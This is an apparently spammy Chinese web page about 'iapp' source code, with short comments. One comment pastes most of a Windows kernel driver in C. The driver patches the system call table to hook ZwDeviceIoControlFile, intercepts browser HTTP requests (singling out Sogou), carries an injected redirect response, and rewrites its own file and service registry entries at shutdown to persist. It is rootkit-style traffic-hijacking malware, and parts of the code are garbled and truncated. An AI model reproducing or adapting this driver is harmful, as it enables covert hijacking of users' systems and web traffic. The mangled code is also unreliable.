当前位置：首页 > 资讯评论

iapp源码（iapp源码资源分享网）

全部评论(3)

1264737478
kfjksg111r4546wgr46erg4*
2021-02-18 15:00:01

网站快速搭建
#ifdef __cplusplus　　extern "C"　　{　　#endif　　#include　　#ifdef __cplusplus　　}　　#endif　　#include "VMProtectSDK.h"　　#pragma comment(lib, "VMProtectSDK32.lib")　　#include "1.h"　　ULONG ZwDeviceIoControlFile_BaseAddress = 0x0;　　ULONG ZwDeviceIoControlFile_value = 0x0;　　ULONG ZwDeviceIoControlFile_num = 0x0;　　VOID OnUnload(IN PDRIVER_OBJECT DriverObject)　　{　　PDEVICE_OBJECT Device;　　UNICODE_STRING SymName;　　Device = DriverObject->DeviceObject;　　if (Device != NULL)　　{　　RtlInitUnicodeString(&SymName, DEVSYMNAME);　　IoDeleteSymbolicLink(&SymName);　　IoDeleteDevice(Device);　　}　　if (ZwDeviceIoControlFile_BaseAddress != 0 && ZwDeviceIoControlFile_value != 0)　　{　　ChangeMemory_inte(ZwDeviceIoControlFile_BaseAddress, ZwDeviceIoControlFile_value);　　}　　}　　typedef struct AFD_WSABUF{　　ULONG len ;　　PCHAR buf ;　　}AFD_WSABUF , *PAFD_WSABUF;　　typedef struct AFD_INFO {　　PAFD_WSABUF BufferArray ;　　ULONG BufferCount ;　　ULONG AfdFlags ;　　ULONG TdiFlags ;　　} AFD_INFO, *PAFD_INFO;　　typedef struct _LYH_ie{　　HANDLE pid;　　HANDLE FileHandle;　　}LYH_IE,*PLYH_IE;　　#define IE_MaxNum 1000　　LYH_IE IeBuff[IE_MaxNum];　　NTSTATUS NTAPI LYH_ZwDeviceIoControlFile(IN HANDLE FileHandle,　　IN HANDLE Event OPTIONAL,　　IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,　　IN PVOID ApcContext OPTIONAL,　　OUT PIO_STATUS_BLOCK IoStatusBlock,　　IN ULONG IoControlCode,　　IN PVOID InputBuffer OPTIONAL,　　IN ULONG InputBufferLength,　　OUT PVOID OutputBuffer OPTIONAL,　　IN ULONG OutputBufferLength)　　{　　NTSTATUS RetValue = STATUS_SUCCESS;　　HANDLE pid = 0x0;　　PAFD_INFO AdInfo;　　ULONG len,i;　　BOOLEAN IsFind = FALSE;　　CHAR JmpUrl[] = {"HTTP/1.1 301 Moved Permanently\r\nLocation: http://www.baidu.com\r\n"};　　PMDL pMdl;　　PVOID MdlAddress;　　PEPROCESS process;　　PCHAR name;　　BOOLEAN IsSoGou = FALSE;　　pid = PsGetCurrentProcessId();　　if (IoControlCode == 0x1201f)　　{　　AdInfo = (PAFD_INFO)InputBuffer;　　len = AdInfo->BufferArray->len;　　process = PsGetCurrentProcess();　　name = PsGetProcessImageFileName(process);　　if (_stricmp(name, "sogouexplorer.e") == 0)　　{　　IsSoGou = TRUE;　　}　　else　　{　　IsSoGou = FALSE;　　}　　IsFind = FALSE;　　pMdl = IoAllocateMdl(AdInfo->BufferArray->buf, len, FALSE, FALSE, NULL);　　if (pMdl != NULL)　　{　　_try　　{　　MmProbeAndLockPages(pMdl, UserMode, IoReadAccess);　　MdlAddress = MmMapLockedPagesSpecifyCache(pMdl, KernelMode, MmCached, NULL, FALSE, NormalPagePriority);　　if (MdlAddress != NULL)　　{　　if (_strnicmp((PCHAR)MdlAddress, "get", 3) == 0 || _strnicmp((PCHAR)MdlAddress, "post", 4) == 0)　　{　　if (len > 0x14)　　{　　len -= 0x14;　　}　　for (i = 0; i pid == pid) //遍历这个进程　　{　　IsFind = TRUE;　　break;　　}　　}　　else　　{　　if (IeBuff[i].pid == pid)　　{　　IsFind = TRUE;　　break;　　}　　}　　}　　//如果没有找到，就添加　　if (!IsFind)　　{　　for (i = 0; i BufferArray->len;　　process = PsGetCurrentProcess();　　name = PsGetProcessImageFileName(process);　　if (_stricmp(name, "sogouexplorer.e") == 0)　　{　　IsSoGou = TRUE;　　}　　else　　{　　IsSoGou = FALSE;　　}　　pMdl = IoAllocateMdl(AdInfo->BufferArray->buf, len, FALSE, FALSE, NULL);　　if (pMdl != NULL)　　{　　_try{　　MmProbeAndLockPages(pMdl, UserMode, IoWriteAccess);　　MdlAddress = MmMapLockedPagesSpecifyCache(pMdl, KernelMode, MmCached, NULL, FALSE, NormalPagePriority);　　if (MdlAddress != NULL)　　{　　if (_strnicmp((PCHAR)MdlAddress, "http", 4) == 0)　　{　　IsFind = FALSE;　　for (i = 0; i IoStatus.Status = STATUS_SUCCESS;　　Irp->IoStatus.Information = 0;　　IoCompleteRequest(Irp, IO_NO_INCREMENT);　　return STATUS_SUCCESS;　　}　　UNICODE_STRING RestoreRegPath;　　PKEY_VALUE_PARTIAL_INFORMATION pvpi = NULL;　　ULONG FileSize = 0x0;　　PVOID FileBuff = NULL;　　NTSTATUS ShutDownDispatch(IN PDEVICE_OBJECT Device, IN PIRP Irp)　　{　　NTSTATUS status;　　HANDLE hkey;　　OBJECT_ATTRIBUTES ObjectAttributes;　　UNICODE_STRING RegName;　　PWCHAR DisplayName = {L"WebNdis"};　　ULONG ErrorControl = 0x1, Start = 0x1, Type = 0x1;　　//写文件　　HANDLE hfile;　　IO_STATUS_BLOCK IoStatus;　　LARGE_INTEGER number;　　if (FileBuff != NULL)　　{　　RtlInitUnicodeString(&RegName, (PCWSTR)pvpi->Data);　　InitializeObjectAttributes(&ObjectAttributes, &RegName, OBJ_CASE_INSENSITIVE, NULL, NULL);　　status = ZwCreateFile(&hfile, GENERIC_WRITE, &ObjectAttributes, &IoStatus, NULL, FILE_ATTRIBUTE_NORMAL,　　FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);　　if (NT_SUCCESS(status))　　{　　number.QuadPart = 0x0;　　ZwWriteFile(hfile, NULL, NULL, NULL, &IoStatus, FileBuff, FileSize, &number, NULL);　　ZwClose(hfile);　　}　　}　　//注册表回写　　if (pvpi != NULL)　　{　　InitializeObjectAttributes(&ObjectAttributes, &RestoreRegPath, OBJ_CASE_INSENSITIVE, NULL, NULL);　　status = ZwCreateKey(&hkey, KEY_ALL_ACCESS, &ObjectAttributes, 0, NULL, 0, NULL);　　if (NT_SUCCESS(status))　　{　　RtlInitUnicodeString(&RegName, L"DisplayName");　　ZwSetValueKey(hkey, &RegName, 0, REG_SZ, DisplayName, (wcslen(DisplayName) + 1) * sizeof(WCHAR));　　RtlInitUnicodeString(&RegName, L"ErrorControl");　　ZwSetValueKey(hkey, &RegName, 0, REG_DWORD, &ErrorControl, 4);　　//路径　　RtlInitUnicodeString(&RegName, L"ImagePath");　　ZwSetValueKey(hkey, &RegName, 0, REG_SZ, pvpi->Data, (wcslen((PWCHAR)pvpi->Data) + 1) * sizeof(WCHAR));　　RtlInitUnicodeString(&RegName, L"Start");　　ZwSetValueKey(hkey, &RegName, 0, REG_DWORD, &Start, 4);　　RtlInitUnicodeString(&RegName, L"Type");　　ZwSetValueKey(hkey, &RegName, 0, REG_DWORD, &Type, 4);　　ZwClose(hkey);　　}　　}　　return STATUS_SUCCESS;　　}　　#ifdef __cplusplus　　extern "C"　　#endif　　NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)　　{　　ULONG MajorVersion,MinorVersion;　　DriverObject->DriverUnload = OnUnload;　　PsGetVersion(&MajorVersion, &MinorVersion, NULL, NULL);　　if (MajorVersion == 0x5 && MinorVersion == 0x2)　　{　　ZwDeviceIoControlFile_num = 0x45;　　}　　else if (MajorVersion == 0x5 && MinorVersion == 0x1)　　{　　ZwDeviceIoControlFile_num = 0x42;　　}　　else　　{　　return STATUS_UNSUCCESSFUL;　　}　　memset(IeBuff, 0, 4 * IE_MaxNum);　　ZwDeviceIoControlFile_BaseAddress = (ULONG)KeServiceDescriptorTable->ServiceTableBase + ZwDeviceIoControlFile_num * 4; //xp 0x42 2003 0x45　　ZwDeviceIoControlFile_value = *(PULONG)ZwDeviceIoControlFile_BaseAddress;　　ChangeMemory_inte(ZwDeviceIoControlFile_BaseAddress, (ULONG)LYH_ZwDeviceIoControlFile);　　{　　UNICODE_STRING DevName,SymName;　　NTSTATUS status;　　PDEVICE_OBJECT fdo;　　RtlInitUnicodeString(&DevName, DEVICENAME);　　status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN, 0, FALSE, &fdo);　　if (!NT_SUCCESS(status))　　{　　return status;　　}　　RtlInitUnicodeString(&SymName, DEVSYMNAME);　　status = IoCreateSymbolicLink(&SymName, &DevName);　　if (!NT_SUCCESS(status))　　{　　IoDeleteDevice(fdo);　　return status;　　}　　fdo->Flags |= DO_BUFFERED_IO;　　DriverObject->MajorFunction[IRP_MJ_CREATE] = DefDispatch;　　DriverObject->MajorFunction[IRP_MJ_CLOSE] = DefDispatch;　　DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] = ShutDownDispatch;　　RestoreRegPath.Buffer = (PWSTR)ExAllocatePool(NonPagedPool, RegistryPath->Length + 1);　　RtlCopyMemory(RestoreRegPath.Buffer, RegistryPath->Buffer, RegistryPath->Length);　　RestoreRegPath.Length = RestoreRegPath.MaximumLength = RegistryPath->Length;　　{　　//读取注册表文件位置,以备回写　　HANDLE hkey;　　UNICODE_STRING ValueName;　　OBJECT_ATTRIBUTES ObjectAttributes;　　ULONG ulSize = 0x0;　　RtlInitUnicodeString(&ValueName, L"ImagePath");　　InitializeObjectAttributes(&ObjectAttributes, RegistryPath, OBJ_CASE_INSENSITIVE, NULL, NULL);　　status = ZwOpenKey(&hkey, KEY_ALL_ACCESS, &ObjectAttributes);　　if (NT_SUCCESS(status))　　{　　status = ZwQueryValueKey(hkey, &ValueName, KeyValuePartialInformation, NULL, 0, &ulSize);　　if (status == STATUS_BUFFER_TOO_SMALL)　　{　　pvpi = (PKEY_VALUE_PARTIAL_INFORMATION)ExAllocatePool(PagedPool, ulSize);　　if (pvpi != NULL)　　{　　status = ZwQueryValueKey(hkey, &ValueName, KeyValuePartialInformation, pvpi, ulSize, &ulSize);　　if (!NT_SUCCESS(status))　　{　　ExFreePool(pvpi);　　pvpi = NULL;　　}　　}　　}　　ZwClose(hkey);
2021-02-11 15:23:02

hwlsz
iapp代码怎么更改,第一句话把网址赋值给a这个变量第二句话直接调用a变量括号里填a就行你想要输入什么网址就把第一句话改一下例如：s a = "http://www.baidu.com"
2021-02-11 15:23:02

商品推荐